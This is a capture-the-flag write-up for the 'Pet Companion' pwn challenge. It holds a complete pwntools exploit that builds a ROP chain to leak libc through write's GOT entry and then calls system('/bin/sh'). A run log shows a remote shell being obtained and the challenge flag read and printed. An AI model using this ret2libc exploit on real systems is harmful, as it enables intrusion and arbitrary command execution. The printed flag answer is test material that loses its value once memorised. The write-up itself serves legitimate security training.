Pet Companion

Challenge Description :

Embark on a journey through this expansive reality, where survival hinges on battling foes. In your quest, a loyal companion is essential. Dogs, mutated and implanted with chips, become your customizable allies. Tailor your pet's demeanor—whether happy, angry, sad, or funny—to enhance your bond on this perilous adventure.

Exploit.py :

from pwn import *


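def start(argv=None, *a, **kw):
	"""Start the target and return the pwntools tube used to talk to it.

	The launch mode is chosen from the pwntools ``args`` flags:
	  GDB    -> run ``exe`` under gdb with ``gdbscript``
	  REMOTE -> connect to the (host, port) given as sys.argv[1], sys.argv[2]
	  (none) -> run ``exe`` as a local process

	Args:
		argv: extra command-line arguments appended after ``exe`` in the
			local and GDB modes. ``None`` means no extra arguments; it
			replaces the original mutable ``[]`` default so that no list
			object is shared between calls.
		*a, **kw: forwarded unchanged to gdb.debug / remote / process.

	Returns:
		The tube returned by the selected pwntools launcher.

	NOTE(review): ``gdbscript`` is referenced here but never defined in this
	file, so the GDB path raises NameError as written.
	"""
	# Copy so a caller's list is never aliased into the launcher call.
	extra = list(argv) if argv else []
	if args.GDB:  # Set GDBscript below
		return gdb.debug([exe] + extra, gdbscript=gdbscript, *a, **kw)
	if args.REMOTE:  # ('server', 'port')
		return remote(sys.argv[1], sys.argv[2], *a, **kw)
	return process([exe] + extra, *a, **kw)  # Run locally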


# Set up pwntools for the correct architecture
exe = './pet_companion'
# This will automatically get context arch, bits, os etc
# (checksec is disabled here, so the binary's own protections are never
# printed; the checksec block in the run log at the bottom of this page is
# pwntools describing libc.so.6, not the target binary)
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'info'

# ===========================================================
#                    EXPLOIT GOES HERE
# ===========================================================

# Lib-C library
# A copy of the target's libc is expected in the working directory. The
# symbol offsets used below (write, system, the "/bin/sh" string) are read
# from this file, so it must be the same build as the one on the remote
# host or every computed address will be wrong.
libc = ELF('libc.so.6')  # Local

# Number of padding bytes before the ROP chain (flat() below pads up to
# this position). Presumably the distance from the input buffer to the
# saved return address as found by the author — TODO confirm against the binary.
offset = 72

# Start program
io = start()

# POP RDI from ropper
# These are fixed 0x400xxx addresses, i.e. they are only meaningful if the
# target binary is loaded at a fixed base (non-PIE) — verify with checksec.
ret = 0x4004de  # NOTE(review): defined but never used below
pop_rdi = 0x400743
# The first chain places two values after this gadget, which suggests a
# "pop rsi; pop r15; ret" sequence (typical of __libc_csu_init) — confirm.
pop_rsi = 0x400741

# Payload to leak libc function
# write takes 3 arguments the second arg is what it will print to the screen
# Stage 1: set rsi to the GOT slot of write (the second copy only fills the
# extra register the gadget pops), call write@plt so the resolved libc
# address stored in that slot is echoed back, then return to main so the
# program accepts a second input. rdi and rdx are not set by the chain;
# the leak relies on whatever values the program left in them.
payload = flat({
	offset: [
		pop_rsi,
		elf.got.write,
		elf.got.write,
		elf.plt.write,
		elf.symbols.main
	]
})

# Send the payload
io.sendlineafter(b'status: ', payload)

# Retrieve got.write address
# Skip three lines of program output that precede the leaked bytes.
io.recvline()
io.recvline()
io.recvline()

# The leaked pointer arrives as raw bytes: keep the first 6 and pad to 8 so
# unpack() (64-bit per context) can decode it.
# NOTE(review): a single recv() is not guaranteed to return the whole chunk,
# so this line depends on the leak arriving in one read.
got_write = unpack(io.recv()[:6].ljust(8, b'\x00'))
info("leaked got_write: %#x", got_write)

# Subtract write's offset inside libc from the leaked GOT value to get the
# libc base (the original comment said "puts"; the symbol actually used is write).
libc.address = got_write - libc.symbols.write
info("libc_base: %#x", libc.address)

# System(/bin/sh)
# Once libc.address is set, libc.symbols and libc.search return absolute
# addresses for this run.
info("system_addr: %#x", libc.symbols.system)
bin_sh = next(libc.search(b'/bin/sh\x00'))
info("bin_sh: %#x", bin_sh)

# Payload to get shell
# Stage 2: same padding, then rdi = "/bin/sh" and return into system().
payload = flat({
	offset: [
		pop_rdi,
		bin_sh,
		libc.symbols.system
	]
})

# Send the payload
# No prompt wait here: the "status: " prompt of the second main() run was
# presumably already consumed by the recv() above.
io.sendline(payload)

# Got Shell?
io.interactive()
┌──(kali㉿kali)-[~/ctf/pwn/pet]
└─$ python exploit.py REMOTE 94.237.53.81 48634
[*] '/home/kali/ctf/pwn/pet/libc.so.6'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to 94.237.53.81 on port 48634: Done
[*] leaked got_write: 0x7fc5bdb920f0
[*] libc_base: 0x7fc5bda82000
[*] system_addr: 0x7fc5bdad1420
[*] bin_sh: 0x7fc5bdc35d88
[*] Switching to interactive mode

[*] Configuring...

$ ls
flag.txt
glibc
pet_companion
$ cat flag.txt
HTB{c0nf1gur3_w3r_d0g}
$  

Flag.txt :

HTB{c0nf1gur3_w3r_d0g}
